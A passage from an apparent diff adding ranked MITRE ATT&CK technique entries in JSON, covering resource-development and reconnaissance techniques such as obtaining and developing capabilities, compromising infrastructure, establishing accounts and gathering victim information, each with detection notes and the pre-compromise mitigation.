operation.\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).", + "url": "https://attack.mitre.org/techniques/T1588/005", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.006", + "name": "Obtain Capabilities: Vulnerabilities", + "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. Exploits) or to attempt to develop one themselves (i.e. Exploits).", + "url": "https://attack.mitre.org/techniques/T1588/006", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 178, + "tid": "T1587", + "name": "Develop Capabilities", + "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.", + "url": "https://attack.mitre.org/techniques/T1587", + "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\nConsider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "score": 0.05952380952380953, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1587.001", + "name": "Develop Capabilities: Malware", + "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of Web Services.(Citation: FireEye APT29)", + "url": "https://attack.mitre.org/techniques/T1587/001", + "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1587.002", + "name": "Develop Capabilities: Code Signing Certificates", + "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\nPrior to Code Signing, adversaries may develop self-signed code signing certificates for use in operations.", + "url": "https://attack.mitre.org/techniques/T1587/002", + "detection": "Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as Code Signing or Install Root Certificate.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1587.003", + "name": "Develop Capabilities: Digital Certificates", + "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if added to the root of trust (i.e. Install Root Certificate).\nAfter creating a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.", + "url": "https://attack.mitre.org/techniques/T1587/003", + "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\nDetection efforts may be focused on related behaviors, such as Web Protocols, Asymmetric Cryptography, and/or Install Root Certificate.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1587.004", + "name": "Develop Capabilities: Exploits", + "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).", + "url": "https://attack.mitre.org/techniques/T1587/004", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 179, + "tid": "T1584", + "name": "Compromise Infrastructure", + "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\nUse of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)", + "url": "https://attack.mitre.org/techniques/T1584", + "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. \nOnce adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "score": 0.05878105476190476, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1584.001", + "name": "Compromise Infrastructure: Domains", + "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)", + "url": "https://attack.mitre.org/techniques/T1584/001", + "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.002", + "name": "Compromise Infrastructure: DNS Server", + "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)", + "url": "https://attack.mitre.org/techniques/T1584/002", + "detection": "Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.003", + "name": "Compromise Infrastructure: Virtual Private Server", + "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.", + "url": "https://attack.mitre.org/techniques/T1584/003", + "detection": "Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.004", + "name": "Compromise Infrastructure: Server", + "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations.\nAdversaries may also compromise web servers to support watering hole operations, as in Drive-by Compromise.", + "url": "https://attack.mitre.org/techniques/T1584/004", + "detection": "Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.005", + "name": "Compromise Infrastructure: Botnet", + "description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).", + "url": "https://attack.mitre.org/techniques/T1584/005", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Phishing, Endpoint Denial of Service, or Network Denial of Service.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.006", + "name": "Compromise Infrastructure: Web Services", + "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service.(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.", + "url": "https://attack.mitre.org/techniques/T1584/006", + "detection": "Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 180, + "tid": "T1585", + "name": "Establish Accounts", + "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for Phishing for Information or Phishing.(Citation: Mandiant APT1)", + "url": "https://attack.mitre.org/techniques/T1585", + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).", + "score": 0.05476190476190476, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1585.001", + "name": "Establish Accounts: Social Media Accounts", + "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).", + "url": "https://attack.mitre.org/techniques/T1585/001", + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1585.002", + "name": "Establish Accounts: Email Accounts", + "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing.(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains).(Citation: Mandiant APT1)\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)", + "url": "https://attack.mitre.org/techniques/T1585/002", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 181, + "tid": "T1591", + "name": "Gather Victim Org Information", + "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing or Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1591", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.05476190476190476, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1591.001", + "name": "Gather Victim Org Information: Determine Physical Locations", + "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites or Social Media).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Phishing or Hardware Additions).", + "url": "https://attack.mitre.org/techniques/T1591/001", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1591.002", + "name": "Gather Victim Org Information: Business Relationships", + "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise, Drive-by Compromise, or Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1591/002", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1591.003", + "name": "Gather Victim Org Information: Identify Business Tempo", + "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise or Trusted Relationship)", + "url": "https://attack.mitre.org/techniques/T1591/003", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1591.004", + "name": "Gather Victim Org Information: Identify Roles", + "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing).", + "url": "https://attack.mitre.org/techniques/T1591/004", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 182, + "tid": "T1589", + "name": "Gather Victim Identity Information", + "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).", + "url": "https://attack.mitre.org/techniques/T1589", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.05476190476190476, + "mitigations": [ + { + "mid": 